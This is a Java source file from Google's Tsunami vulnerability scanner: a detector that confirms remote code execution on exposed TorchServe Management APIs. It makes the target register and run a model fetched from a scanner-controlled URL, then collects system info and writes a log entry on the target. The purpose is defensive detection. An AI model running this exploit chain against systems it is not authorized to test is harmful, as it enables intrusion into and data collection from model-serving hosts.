/*
 * Copyright 2023 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
package com.google.tsunami.plugins.detectors.rce.torchserve;

import static com.google.common.base.Preconditions.checkNotNull;

import com.google.common.flogger.GoogleLogger;
import com.google.errorprone.annotations.CanIgnoreReturnValue;
import com.google.gson.Gson;
import com.google.gson.GsonBuilder;
import com.google.gson.JsonArray;
import com.google.gson.JsonElement;
import com.google.gson.JsonObject;
import com.google.gson.JsonParseException;
import com.google.gson.JsonParser;
import com.google.tsunami.common.data.NetworkServiceUtils;
import com.google.tsunami.common.net.http.HttpClient;
import com.google.tsunami.common.net.http.HttpHeaders;
import com.google.tsunami.common.net.http.HttpMethod;
import com.google.tsunami.common.net.http.HttpRequest;
import com.google.tsunami.common.net.http.HttpResponse;
import com.google.tsunami.plugin.payload.Payload;
import com.google.tsunami.plugin.payload.PayloadGenerator;
import com.google.tsunami.proto.AdditionalDetail;
import com.google.tsunami.proto.NetworkService;
import com.google.tsunami.proto.PayloadGeneratorConfig;
import com.google.tsunami.proto.Severity;
import com.google.tsunami.proto.TextData;
import java.io.IOException;
import java.security.MessageDigest;
import java.time.Instant;
import java.util.ArrayList;
import java.util.List;
import javax.inject.Inject;
import okhttp3.HttpUrl;
import org.checkerframework.checker.nullness.qual.Nullable;

public class TorchServeExploiter {
  private static final GoogleLogger logger = GoogleLogger.forEnclosingClass();
  private final HttpClient httpClient;
  public final Details details;
  private final PayloadGenerator payloadGenerator;
  private final TorchServeManagementAPIExploiterWebServer webServer;
  private Payload payload;
  public TorchServeRandomUtils randomUtils;

  enum ExploitationMode {
    // Just detect the TorchServe Management API, do not attempt to exploit.
    BASIC,
    // Provide Tsunami callback server's URL as a model source, consider any callback as a
    // confirmation.
    SSRF,
    // Provide a static URL as a model source, verify code execution directly.
    STATIC,
    // Serve a model locally, verify code execution directly.
    LOCAL
  }

  public class Details {
    // Effective settings (merged from config file and cli args)
    public ExploitationMode exploitationMode;
    public String staticUrl;
    public String localBindHost;
    public int localBindPort;
    public String localAccessibleUrl;

    // Data collected during the exploit
    public List<String> models;
    public boolean hashVerification = false;
    public boolean callbackVerification = false;
    public String systemInfo;
    public boolean cleanupFailed = false;
    public String modelName;
    public String targetUrl;
    public String exploitUrl;
    public String messageLogged;

    static final String LOG_MESSAGE =
        "Tsunami TorchServe Plugin: Detected and executed. Refer to Tsunami Security Scanner repo"
            + " for details. No malicious activity intended. Timestamp: %s";

    /**
     * Constructor for Details class. Initializes the details with configuration and command line
     * arguments.
     *
     * @param config Configuration object.
     * @param args Command line arguments.
     */
    public Details(TorchServeManagementApiConfig config, TorchServeManagementApiArgs args) {
      initializeExploitationMode(args, config);
      initializeUrls(args, config);
      validateParameters();
    }

    private void initializeExploitationMode(
        TorchServeManagementApiArgs args, TorchServeManagementApiConfig config) {
      String mode = args.exploitationMode != null ? args.exploitationMode : config.exploitationMode;
      if (mode.equals("auto")) {
        this.exploitationMode =
            payloadGenerator.isCallbackServerEnabled()
                ? ExploitationMode.SSRF
                : ExploitationMode.BASIC;
      } else {
        this.exploitationMode = ExploitationMode.valueOf(mode.toUpperCase());
      }
    }

    private void initializeUrls(
        TorchServeManagementApiArgs args, TorchServeManagementApiConfig config) {
      this.staticUrl = args.staticUrl != null ? args.staticUrl : config.staticUrl;
      this.localBindHost = args.localBindHost != null ? args.localBindHost : config.localBindHost;
      this.localBindPort = args.localBindPort != 0 ? args.localBindPort : config.localBindPort;
      this.localAccessibleUrl =
          args.localAccessibleUrl != null ? args.localAccessibleUrl : config.localAccessibleUrl;
    }

    private void validateParameters() {
      if (this.exploitationMode == ExploitationMode.STATIC && this.staticUrl == null) {
        throw new IllegalArgumentException(
            "Static mode requires --torchserve-management-api-model-static-url");
      }

      if (this.exploitationMode == ExploitationMode.LOCAL) {
        if (this.localBindHost == null
            || this.localBindPort == 0
            || this.localAccessibleUrl == null) {
          throw new IllegalArgumentException(
              "Local mode requires --torchserve-management-api-local-bind-host,"
                  + " --torchserve-management-api-local-bind-port and"
                  + " --torchserve-management-api-local-accessible-url");
        }
      }
    }

    public Severity getSeverity() {
      return isVerified() ? Severity.CRITICAL : Severity.LOW;
    }

    public boolean isVerified() {
      return this.hashVerification || this.callbackVerification;
    }

    public AdditionalDetail generateAdditionalDetails() {
      StringBuilder additionalDetails = new StringBuilder();

      switch (this.exploitationMode) {
        case BASIC:
          additionalDetails.append(
              "Callback verification is not enabled in Tsunami configuration, so the exploit"
                  + " could not be confirmed and only the Management API detection is reported."
                  + " It is recommended to enable callback verification for more conclusive"
                  + " vulnerability assessment.");
          if (this.models != null && !this.models.isEmpty()) {
            additionalDetails
                .append("\nModels found on the target:\n  - ")
                .append(String.join("\n  - ", this.models));
          }
          break;
        case SSRF:
          additionalDetails.append(
              "A callback was received from the target while adding a new model, confirming the"
                  + " exploit. Code execution was not verified directly. For a more direct"
                  + " confirmation of remote code execution, consider using STATIC or LOCAL"
                  + " modes.");
          if (this.models != null && !this.models.isEmpty()) {
            additionalDetails
                .append("\nModels found on the target:\n  - ")
                .append(String.join("\n  - ", this.models));
          }
          break;
        case STATIC:
        case LOCAL:
          additionalDetails
              .append(
                  "Code execution was verified by adding a new model to the target and performing"
                      + " following actions:\n")
              .append(
                  "  - Calculating a hash of a random value and comparing it to the value returned"
                      + " by the target ("
                      + (this.hashVerification ? "Success" : "Failure")
                      + ")\n");

          if (payloadGenerator.isCallbackServerEnabled()) {
            additionalDetails.append(
                "  - Sending a callback to the target and confirming that the callback URL was"
                    + " received ("
                    + (this.callbackVerification ? "Success" : "Failure")
                    + ")\n");
          }

          additionalDetails
              .append("System info collected from the target:\n")
              .append(prettyPrintJson(this.systemInfo))
              .append("\n\n")
              .append("The following log entry was generated on the target:\n\n")
              .append(this.messageLogged);
          if (this.models != null && !this.models.isEmpty()) {
            additionalDetails
                .append("\n\nModels found on the target:\n  - ")
                .append(String.join("\n  - ", this.models));
          }
          break;
      }

      return AdditionalDetail.newBuilder()
          .setDescription("Additional details")
          .setTextData(TextData.newBuilder().setText(additionalDetails.toString()).build())
          .build();
    }
  }

  @Inject
  public TorchServeExploiter(
      TorchServeManagementApiConfig config,
      TorchServeManagementApiArgs args,
      HttpClient httpClient,
      PayloadGenerator payloadGenerator,
      TorchServeManagementAPIExploiterWebServer webServer,
      TorchServeRandomUtils randomUtils) {
    this.httpClient =
        checkNotNull(httpClient, "httpClient must not be null")
            .modify()
            .setFollowRedirects(false)
            .build();
    this.payloadGenerator = checkNotNull(payloadGenerator, "payloadGenerator must not be null");
    this.details =
        new Details(
            checkNotNull(config, "config must not be null"),
            checkNotNull(args, "args must not be null"));
    this.webServer = checkNotNull(webServer, "webServer must not be null");
    this.randomUtils = checkNotNull(randomUtils, "randomUtils must not be null");
  }

  /**
   * Verifies if the target service is vulnerable to TorchServe Management API RCE.
   *
   * @param service The network service to be checked.
   * @return Details of the vulnerability if found, null otherwise.
   */
  public @Nullable Details isServiceVulnerable(NetworkService service) {
    HttpUrl targetUrl = buildTargetUrl(service);

    try {
      return isServiceVulnerable(targetUrl);
    } catch (IOException e) {
      logger.atWarning().withCause(e).log(
          "Failed to check if service is vulnerable due to network error");
    } catch (Exception e) {
      logger.atSevere().withCause(e).log(
          "Unexpected error occurred while checking service vulnerability");
    } finally {
      cleanupExploit();
    }
    return null;
  }

  private @Nullable Details isServiceVulnerable(HttpUrl targetUrl) throws IOException {
    if (!isTorchServe(targetUrl)) {
      return null;
    }
    logger.atInfo().log("Target matches TorchServe Management API fingerprint");

    // Scrape the list of models from the target
    String modelName = getModelName(targetUrl);

    String url;
    switch (this.details.exploitationMode) {
      case BASIC:
        logger.atFine().log("BASIC MODE");
        // It looks like TorchServe management API, but we can't exploit it as callback
        // functionality has not been enabled
        logger.atInfo().log("Callback verification is not enabled, skipping exploit");
        return this.details;
      case SSRF:
        logger.atFine().log("SSRF MODE");
        // Set the model URL to the Tsunami callback server, consider any callback as a confirmation
        executeExploit(targetUrl, getTsunamiCallbackUrl(), modelName);
        return checkTsunamiCallbackUrl() ? this.details : null;
      case STATIC:
        logger.atFine().log("STATIC MODE");
        // Use the provided URL as a model source, confirm code execution directly
        url = this.details.staticUrl;
        break;
      case LOCAL:
        logger.atFine().log("LOCAL MODE");
        // Serve the model locally, confirm code execution directly
        url = serveExploitFile(modelName);
        break;
      default:
        throw new IllegalArgumentException("Invalid mode: " + this.details.exploitationMode);
    }

    // Common verification for STATIC and LOCAL

    executeExploit(targetUrl, url, modelName);

    // 1. Was the model added to the list of models?
    // if (!getModelNames(targetUrl).contains(modelName)) return null;
    if (!modelExists(targetUrl, modelName)) {
      return null;
    }

    // 2. Can we simulate code execution (hash + callback)?
    if (!verifyExploit(targetUrl, modelName)) {
      return null;
    }

    // Report confirmed vulnerability
    return this.details;
  }

  /** Verifies that the model was added to the list of models on the target. */
  private boolean modelExists(HttpUrl targetUrl, String modelName) throws IOException {
    HttpUrl url = targetUrl.newBuilder().addPathSegment("models").addPathSegment(modelName).build();
    JsonElement response = sendHttpRequestGetJson(HttpMethod.GET, url, null);
    return response != null;
  }

  /**
   * Verifies if the exploit was successful on the target server.
   *
   * <p>This method simulates code execution through hash calculation and, if enabled, through
   * Tsunami's callback server. It also logs and collects system info from the target.
   *
   * @param targetUrl The URL of the target server.
   * @param modelName The name of the model used in the exploit.
   * @return True if the exploit is verified successfully, false otherwise.
   * @throws IOException If an I/O error occurs during the verification process.
   */
  private boolean verifyExploit(HttpUrl targetUrl, String modelName) throws IOException {
    boolean verified = false;

    // Simulate code execution through a hash calculation
    String randomValue = randomUtils.getRandomValue();
    String hashReceived = interact(targetUrl, modelName, "tsunami-execute", randomValue);
    this.details.hashVerification = randomUtils.validateHash(hashReceived, randomValue);
    verified = this.details.hashVerification;

    // Simulate code execution through Tsunami's callback server
    if (this.payloadGenerator.isCallbackServerEnabled()) {
      String callbackUrl = getTsunamiCallbackUrl();
      interact(targetUrl, modelName, "tsunami-callback", callbackUrl);
      verified |= checkTsunamiCallbackUrl();
    }

    // One of the verification methods must succeed for the exploit to be confirmed
    if (!verified) {
      return false;
    }

    // generate the log file entry on the remote server and collect system info
    // generate the log message by adding a timestamp to the template
    this.details.messageLogged = String.format(Details.LOG_MESSAGE, Instant.now().toString());
    interact(targetUrl, modelName, "tsunami-log", this.details.messageLogged);
    this.details.systemInfo = interact(targetUrl, modelName, "tsunami-info", "True");

    return true;
  }

  private boolean compareHash(String randomValue, String hash) {
    try {
      MessageDigest md = MessageDigest.getInstance("MD5");
      byte[] digest = md.digest(randomValue.getBytes());
      String expectedHash = String.format("%032x", new java.math.BigInteger(1, digest));
      return expectedHash.equals(hash);
    } catch (java.security.NoSuchAlgorithmException e) {
      return false;
    }
  }

  /**
   * Sends an HTTP request to interact with a specific model on the TorchServe server.
   *
   * <p>This method communicates with the TorchServe model via the Management API, utilizing the
   * 'customized=true' query parameter to bypass the need for locating the Inference API. It sends a
   * request with custom headers and extracts the response from the 'customizedMetadata' field.
   *
   * <p>Note: This approach is used to directly interact with the model through Management API,
   * avoiding issues with locating the Inference API which may be on a different port or not
   * exposed.
   *
   * @param targetUrl The base URL of the TorchServe Management API.
   * @param modelName The name of the model to interact with.
   * @param headerName The name of the header to send in the request.
   * @param headerValue The value of the header to send in the request.
   * @return The response extracted from 'customizedMetadata' field, or null if an error occurs.
   * @throws IOException If an I/O error occurs during the HTTP request.
   */
  private @Nullable @CanIgnoreReturnValue String interact(
      HttpUrl targetUrl, String modelName, String headerName, String headerValue)
      throws IOException {
    // Generally in order to talk to a model we need to use an Inference API (default port: 8080)
    // which is separate
    // from the Management API (default port: 8081). However, there is a way to hit the model even
    // through Management
    // API by adding the "customized=true" query parameter to the request, as documented here:
    //
    // https://pytorch.org/serve/management_api.html#:~:text=customized=true
    //
    // We're using this trick to send a request to the model in order to avoid the need to locate
    // the Inference API
    // (which might be remapped to an arbitrary port or not exposed at all).
    // With this approach, the actual payload is passed through `tsunami-*` headers and responses
    // are placed to the
    // "customizedMetadata" field of the response.
    //
    // Look at model.py for the supported headers and their meaning.
    //
    //   $ curl http://torchserve-081:8081/models/somerandomname?customized=true \
    //              -H 'tsunami-header: <An input value goes here>'
    //   [
    //     {
    //       "modelName": "somerandomname",
    //       "modelVersion": "1.0",
    //       "modelUrl": "https://s3.amazonaws.com/model.mar",
    //       "runtime": "python",
    //       "minWorkers": 1,
    //       "maxWorkers": 1,
    //       "batchSize": 1,
    //       "maxBatchDelay": 100,
    //       "loadedAtStartup": false,
    //       "workers": [
    //         {
    //           "id": "9029",
    //           "startTime": "2023-12-18T22:50:13.994Z",
    //           "status": "READY",
    //           "memoryUsage": 227737600,
    //           "pid": 1719,
    //           "gpu": false,
    //           "gpuUsage": "N/A"
    //         }
    //       ],
    //       "customizedMetadata": "<Output value appears here>"
    //     }
    //   ]
    HttpHeaders header = HttpHeaders.builder().addHeader(headerName, headerValue).build();
    HttpUrl url =
        targetUrl
            .newBuilder()
            .addPathSegment("models")
            .addPathSegment(modelName)
            .addQueryParameter("customized", "true")
            .build();

    try {
      JsonObject response =
          sendHttpRequestGetJsonArray(HttpMethod.GET, url, header).get(0).getAsJsonObject();
      String result = response.get("customizedMetadata").getAsString();
      return result;
    } catch (NullPointerException | ClassCastException e) {
      return null;
    }
  }

  /**
   * Constructs the target URL for a given network service.
   *
   * <p>This method builds the root URL for a web application based on the provided network service
   * details, typically used as the base URL for further API interactions.
   *
   * @param service The network service for which the URL is being constructed.
   * @return The constructed HttpUrl object for the network service.
   */
  private HttpUrl buildTargetUrl(NetworkService service) {
    return HttpUrl.parse(NetworkServiceUtils.buildWebApplicationRootUrl(service));
  }

  /**
   * Generates a callback URL for Tsunami's payload generator.
   *
   * <p>This method configures and generates a payload for Tsunami's callback server, typically used
   * in SSRF vulnerability testing. The callback URL is used to verify if an external interaction
   * with the Tsunami server occurs, indicating a successful SSRF exploit.
   *
   * @return The generated callback URL for the Tsunami payload.
   */
  private String getTsunamiCallbackUrl() {
    PayloadGeneratorConfig config =
        PayloadGeneratorConfig.newBuilder()
            .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.SSRF)
            .setInterpretationEnvironment(
                PayloadGeneratorConfig.InterpretationEnvironment.INTERPRETATION_ANY)
            .setExecutionEnvironment(PayloadGeneratorConfig.ExecutionEnvironment.EXEC_ANY)
            .build();
    this.payload = this.payloadGenerator.generate(config);
    return this.payload.getPayload();
  }

  private boolean checkTsunamiCallbackUrl() {
    this.details.callbackVerification = this.payload != null && this.payload.checkIfExecuted();
    return this.details.callbackVerification;
  }

  /**
   * Checks whether the specified target URL corresponds to a TorchServe management API.
   *
   * <p>This method sends a GET request to the target URL to retrieve the API description. It then
   * checks if the response matches the expected signature of a TorchServe management API.
   *
   * @param targetUrl The URL of the target service to be checked.
   * @return True if the target URL is a TorchServe management API, false otherwise.
   * @throws IOException If a network error occurs during the HTTP request.
   */
  private boolean isTorchServe(HttpUrl targetUrl) throws IOException {
    try {
      JsonObject response =
          sendHttpRequestGetJsonObject(HttpMethod.GET, targetUrl, "api-description");
      return response != null && isTorchServeResponse(response);
    } catch (IOException e) {
      logger.atSevere().withCause(e).log("Error checking if target is TorchServe");
      throw e;
    }
  }

  /**
   * Determines if the given response matches the expected signature of a TorchServe API.
   *
   * <p>Analyzes the JSON structure of the response to verify if it contains key elements that match
   * the TorchServe API's characteristics, such as the API title and the presence of specific
   * operation IDs.
   *
   * @param response The JSON object representing the HTTP response to analyze.
   * @return True if the response matches the expected TorchServe signature, false otherwise.
   */
  private boolean isTorchServeResponse(JsonObject response) {
    // Expected JSON structure
    // {
    //   "openapi": "3.0.1",
    //   "info": {
    //     "title": "TorchServe APIs",
    //     "description": "TorchServe is a flexible and easy to use tool for serving deep learning
    // models",
    //     "version": "0.8.1"
    //   },
    //   "paths": {
    //     "/models": {
    //       "post": {
    //         "description": "Register a new model in TorchServe.",
    //         "operationId": "registerModel",
    String apiTitle = getNestedKey(response, "info", "title");
    String registerModel = getNestedKey(response, "paths", "/models", "post", "operationId");

    return response.has("openapi")
        && apiTitle != null
        && apiTitle.equals("TorchServe APIs")
        && registerModel != null
        && registerModel.equals("registerModel");
  }

  /**
   * Retrieves a nested key value from a JSON object.
   *
   * <p>This method navigates through a JSON object using a sequence of keys to retrieve the final
   * value. It is primarily used for extracting specific data from complex JSON structures.
   *
   * @param object The JSON object from which to extract the value.
   * @param keys A sequence of keys used to navigate to the desired value in the JSON object.
   * @return The string value of the nested key, or null if the key does not exist or is not a
   *     string.
   */
  private @Nullable String getNestedKey(JsonObject object, String... keys) {
    try {
      // Traverse the JSON object until the last key - expect JsonObject at every step
      for (int i = 0; i < keys.length - 1; i++) {
        object = object.getAsJsonObject(keys[i]);
      }

      // Return the value of the last key - expect it to be a String
      return object.get(keys[keys.length - 1]).getAsString();
    } catch (NullPointerException | ClassCastException e) {
      return null;
    }
  }

  /**
   * Generates a unique model name that does not already exist on the target TorchServe server.
   *
   * <p>This method retrieves a list of existing model names from the target server and generates a
   * new, random model name that is not in that list.
   *
   * @param targetUrl The URL of the TorchServe server to check for existing model names.
   * @return A unique model name.
   * @throws IOException If a network error occurs during the HTTP request.
   */
  private String getModelName(HttpUrl targetUrl) throws IOException {
    // get the list of models from the target
    List<String> models = getModelNames(targetUrl);
    this.details.models = models;

    return generateRandomModelName(models);
  }

  /**
   * Generates a random model name that is not present in the provided list of existing models.
   *
   * <p>This method generates a random string and ensures that this string is not already used as a
   * model name on the target server.
   *
   * @param existingModels A list of model names that already exist on the server.
   * @return A randomly generated, unique model name.
   */
  private String generateRandomModelName(List<String> existingModels) {
    String modelName;
    do {
      modelName = randomUtils.getRandomValue();
    } while (existingModels.contains(modelName));
    return modelName;
  }

  /**
   * Retrieves a list of model names from the TorchServe server.
   *
   * <p>Sends a GET request to the target server's API to fetch the list of currently loaded models.
   * Note: Handles pagination to retrieve all models if more than the default page limit.
   *
   * @param targetUrl The URL of the TorchServe server.
   * @return A list of model names present on the server.
   * @throws IOException If a network error occurs during the HTTP request.
   */
  private List<String> getModelNames(HttpUrl targetUrl) throws IOException {
    // get the list of models from the target
    List<String> models = new ArrayList<>();
    JsonObject response = sendHttpRequestGetJsonObject(HttpMethod.GET, targetUrl, "models");
    if (response == null) {
      return models;
    }

    // TODO: there's pagination with default limit of 100 models per page
    // https://github.com/pytorch/serve/blob/master/docs/management_api.md#list-models
    //
    // Expected JSON structure:
    // "models": [
    //   {
    //     "modelName": "squeezenet1_1",
    //     "modelUrl": "https://torchserve.pytorch.org/mar_files/squeezenet1_1.mar"
    //   },

    try {
      JsonArray modelsArray = response.getAsJsonArray("models");
      for (JsonElement model : modelsArray) {
        models.add(model.getAsJsonObject().get("modelName").getAsString());
      }
    } catch (NullPointerException | ClassCastException e) {
      // No models found, we'll return an empty list
    }
    return models;
  }

  /**
   * Removes a model from the TorchServe server by its name.
   *
   * <p>This method sends a DELETE request to the server's API to remove a model specified by its
   * name.
   *
   * @param targetUrl The URL of the TorchServe server.
   * @param modelName The name of the model to be removed.
   * @throws IOException If a network error occurs during the HTTP request.
   */
  private void removeModelByName(HttpUrl targetUrl, String modelName) throws IOException {
    sendHttpRequestGetJsonObject(HttpMethod.DELETE, targetUrl, "models", modelName);
  }

  /**
   * Removes a model from the TorchServe server by its URL.
   *
   * <p>Retrieves the list of models from the server and searches for a model with the specified
   * URL. If found, it uses the model's name to remove it from the server.
   *
   * @param targetUrl The URL of the TorchServe server.
   * @param url The URL of the model to be removed.
   */
  private void removeModelByUrl(HttpUrl targetUrl, String url) {
    try {
      // Get the list of models from the target
      JsonObject response = sendHttpRequestGetJsonObject(HttpMethod.GET, targetUrl, "models");

      // Look for the model with the specified URL and remove it
      JsonArray modelsArray = response.getAsJsonArray("models");
      for (JsonElement model : modelsArray) {
        JsonObject modelObject = model.getAsJsonObject();
        if (modelObject.get("modelUrl").getAsString().equals(url)) {
          String modelName = modelObject.get("modelName").getAsString();
          removeModelByName(targetUrl, modelName);
        }
      }
    } catch (NullPointerException | ClassCastException | IOException e) {
      // No models, nothing to remove
    }
  }

  /**
   * Starts the web server and serves the exploit file.
   *
   * <p>This method initiates the web server bound to a specified host and port, and serves an
   * exploit file located at a given URL. It is used in LOCAL exploitation mode to host the exploit
   * payload.
   *
   * @param modelName The name of the model to be used in the exploit file's name.
   * @return The URL where the exploit file is served.
   * @throws IOException If an error occurs while starting the web server.
   */
  private String serveExploitFile(String modelName) throws IOException {
    this.webServer.start(this.details.localBindHost, this.details.localBindPort);
    HttpUrl baseUrl =
        HttpUrl.parse(this.details.localAccessibleUrl)
            .newBuilder()
            .addPathSegment(modelName + ".mar")
            .build();
    return baseUrl.toString();
  }

  /**
   * Executes the exploit against the target TorchServe service.
   *
   * <p>Constructs and sends an HTTP POST request to add a new model to the TorchServe service. The
   * response is analyzed to determine if the model registration was successful, indicating a
   * potential exploit.
   *
   * @param targetUrl The URL of the target TorchServe service.
   * @param exploitUrl The URL of the exploit payload.
   * @param modelName The name of the model to register.
   * @return True if the exploit execution led to successful model registration, false otherwise.
   * @throws IOException If a network error occurs during the HTTP request.
   */
  private @CanIgnoreReturnValue boolean executeExploit(
      HttpUrl targetUrl, String exploitUrl, String modelName) throws IOException {
    HttpUrl url =
        targetUrl
            .newBuilder()
            .addPathSegment("models")
            .addEncodedQueryParameter("url", exploitUrl)
            .addQueryParameter("batch_size", "1")
            .addQueryParameter("initial_workers", "1")
            .addQueryParameter("synchronous", "true")
            .addQueryParameter("model_name", modelName)
            .build();
    this.details.targetUrl = targetUrl.toString();
    this.details.exploitUrl = exploitUrl;

    // Remove any existing models with the same URL
    removeModelByUrl(targetUrl, exploitUrl);

    JsonObject response = sendHttpRequestGetJsonObject(HttpMethod.POST, url);
    if (response == null) {
      return false;
    }

    // Expected response (200):
    //
    // { "status": "Model \"squeezenet1_1\" Version: 1.0 registered with 1 initial workers" }
    //
    // Expected response (500):
    // {
    //   "code": 500,
    //   "type": "InternalServerException",
    //   "message": "Model file already exists squeezenet1_1.mar"
    // }
    String message = getNestedKey(response, "status");
    if (message == null) {
      return false;
    }

    return message.contains("registered with 1 initial workers");
  }

  /**
   * Performs cleanup operations after exploit execution.
   *
   * <p>This method removes the added model from the TorchServe service and stops the web server. It
   * is essential for reverting changes made during the exploitation process to maintain a clean
   * state.
   */
  private void cleanupExploit() {
    if (this.details.modelName == null || this.details.targetUrl == null) {
      return;
    }

    try {
      removeModelByName(HttpUrl.parse(this.details.targetUrl), this.details.modelName);
    } catch (IOException e) {
      logger.atWarning().withCause(e).log("Failed to cleanup exploit");
      this.details.cleanupFailed = true;
    }

    this.webServer.stop();
  }

  /**
   * Sends an HTTP request and returns the response as a JsonObject.
   *
   * @param method The HTTP method to use for the request.
   * @param baseUrl The base URL for the request.
   * @param pathSegments Additional path segments to append to the base URL.
   * @return The response as a JsonObject, or null if the response is not a valid JSON object.
   * @throws IOException If a network error occurs during the HTTP request.
   */
  private @CanIgnoreReturnValue @Nullable JsonObject sendHttpRequestGetJsonObject(
      HttpMethod method, HttpUrl baseUrl, String... pathSegments) throws IOException {
    return sendHttpRequestGetJson(method, baseUrl, null, pathSegments).getAsJsonObject();
  }

  /**
   * Sends an HTTP request and returns the response as a JsonArray.
   *
   * @param method The HTTP method to use for the request.
   * @param baseUrl The base URL for the request.
   * @param headers The HTTP headers to include in the request.
   * @param pathSegments Additional path segments to append to the base URL.
   * @return The response as a JsonArray, or null if the response is not a valid JSON array.
   * @throws IOException If a network error occurs during the HTTP request.
   */
  private @Nullable JsonArray sendHttpRequestGetJsonArray(
      HttpMethod method, HttpUrl baseUrl, HttpHeaders headers, String... pathSegments)
      throws IOException {
    return sendHttpRequestGetJson(method, baseUrl, headers, pathSegments).getAsJsonArray();
  }

  /**
   * Sends an HTTP request and returns the response body as a JsonElement.
   *
   * @param method The HTTP method to use for the request.
   * @param baseUrl The base URL for the request.
   * @param headers The HTTP headers to include in the request.
   * @param pathSegments Additional path segments to append to the base URL.
   * @return The response body as a JsonElement, or null if the response body is not valid JSON.
   * @throws IOException If a network error occurs during the HTTP request.
   */
  private @Nullable JsonElement sendHttpRequestGetJson(
      HttpMethod method, HttpUrl baseUrl, HttpHeaders headers, String... pathSegments)
      throws IOException {
    if (headers == null) {
      headers = HttpHeaders.builder().build();
    }

    HttpUrl url = baseUrl;
    if (pathSegments.length > 0) {
      url = url.newBuilder().addPathSegments(String.join("/", pathSegments)).build();
    }

    HttpRequest request =
        HttpRequest.builder().setHeaders(headers).setMethod(method).setUrl(url).build();
    HttpResponse response = this.httpClient.send(request);

    return response
        .bodyJson()
        .orElseThrow(() -> new IOException("Couldn't parse response body as JSON"));
  }

  /**
   * Pretty prints a JSON string.
   *
   * <p>Formats a given JSON string to a more readable form with proper indentation. If the input
   * string is not valid JSON, it returns the original string.
   *
   * @param json The JSON string to be pretty printed.
   * @return The pretty-printed version of the JSON string, or the original string if it's not valid
   *     JSON.
   */
  private String prettyPrintJson(String json) {
    try {
      Gson gson = new GsonBuilder().setPrettyPrinting().create();
      JsonParser jp = new JsonParser();
      JsonElement je = jp.parse(json);
      return gson.toJson(je);
    } catch (JsonParseException e) {
      return json;
    }
  }
}
